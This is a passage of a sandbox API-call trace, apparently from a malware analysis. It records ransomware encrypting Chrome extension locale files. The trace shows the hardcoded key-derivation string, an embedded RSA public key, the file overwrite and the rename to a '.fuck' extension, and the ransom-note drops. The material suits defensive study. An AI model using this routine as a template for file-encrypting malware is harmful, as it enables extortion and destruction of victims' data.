Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.226] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.229] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.229] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.229] CryptHashData (hHash=0x28e7df8, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.229] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x28e7df8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x28e8078) returned 1 [0250.229] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.229] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.229] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939520) returned 1 [0250.230] CryptImportPublicKeyInfo (in: hCryptProv=0x2939520, dwCertEncodingType=0x1, pInfo=0x2934c20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934c50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934c58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937f38) returned 1 [0250.230] CryptEncrypt (in: hKey=0x2937f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.230] CryptEncrypt (in: hKey=0x2937f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29399e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29399e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.230] WriteFile (in: hFile=0x5d58, lpBuffer=0x29399e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29399e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.231] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xfb, lpOverlapped=0x0) returned 1 [0250.233] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xfb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.233] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.233] CloseHandle (hObject=0x5d5c) returned 1 [0250.233] CloseHandle (hObject=0x5d58) returned 1 [0250.233] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), bFailIfExists=0) returned 1 [0250.238] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json", dwFileAttributes=0x0) returned 1 [0250.238] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.gsg")) returned 1 [0250.240] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.fuck")) returned 1 [0250.241] CryptDestroyHash (hHash=0x28e7df8) returned 1 [0250.241] CryptDestroyKey (hKey=0x28e8078) returned 1 [0250.241] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.241] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.241] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0250.241] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\readme_back_files.htm")) returned 0xffffffff [0250.241] AreFileApisANSI () returned 1 [0250.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.242] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.242] GetFileType (hFile=0x5d54) returned 0x1 [0250.242] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.244] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.244] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x28e88b8 [0250.244] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.244] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.245] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.245] GetLastError () returned 0x0 [0250.245] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json")) returned 0x20 [0250.245] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json", dwFileAttributes=0x80) returned 1 [0250.246] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.246] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.247] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.247] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.250] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.250] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.250] CryptHashData (hHash=0x28e7df8, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.250] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x28e7df8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938978) returned 1 [0250.250] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.250] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.250] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939a70) returned 1 [0250.251] CryptImportPublicKeyInfo (in: hCryptProv=0x2939a70, dwCertEncodingType=0x1, pInfo=0x29345a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29345d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29345d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29859a0) returned 1 [0250.251] CryptEncrypt (in: hKey=0x29859a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.251] CryptEncrypt (in: hKey=0x29859a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2938b90*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2938b90*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.251] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2938b90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2938b90*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.252] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xf3, lpOverlapped=0x0) returned 1 [0250.253] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.253] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.254] CloseHandle (hObject=0x5d58) returned 1 [0250.254] CloseHandle (hObject=0x5d5c) returned 1 [0250.254] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), bFailIfExists=0) returned 1 [0250.258] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json", dwFileAttributes=0x0) returned 1 [0250.259] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.gsg")) returned 1 [0250.261] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.fuck")) returned 1 [0250.262] CryptDestroyHash (hHash=0x28e7df8) returned 1 [0250.262] CryptDestroyKey (hKey=0x2938978) returned 1 [0250.262] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.262] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.262] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0250.262] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\readme_back_files.htm")) returned 0xffffffff [0250.262] AreFileApisANSI () returned 1 [0250.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.263] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.263] GetFileType (hFile=0x5d54) returned 0x1 [0250.263] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.265] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.265] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985d20 [0250.265] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.265] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.265] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.266] GetLastError () returned 0x0 [0250.266] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json")) returned 0x20 [0250.266] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 [0250.266] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.267] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.269] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.269] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.273] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.273] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.273] CryptHashData (hHash=0x2985960, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.273] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2985960, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985aa0) returned 1 [0250.273] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.273] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.273] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2938c18) returned 1 [0250.274] CryptImportPublicKeyInfo (in: hCryptProv=0x2938c18, dwCertEncodingType=0x1, pInfo=0x2934740*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934770*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934778*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985da0) returned 1 [0250.274] CryptEncrypt (in: hKey=0x2985da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.274] CryptEncrypt (in: hKey=0x2985da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939740*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939740*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.274] WriteFile (in: hFile=0x5d58, lpBuffer=0x2939740*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939740*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.275] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x101, lpOverlapped=0x0) returned 1 [0250.277] CryptEncrypt (in: hKey=0x2985aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x101, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.277] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.277] CloseHandle (hObject=0x5d5c) returned 1 [0250.277] CloseHandle (hObject=0x5d58) returned 1 [0250.277] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 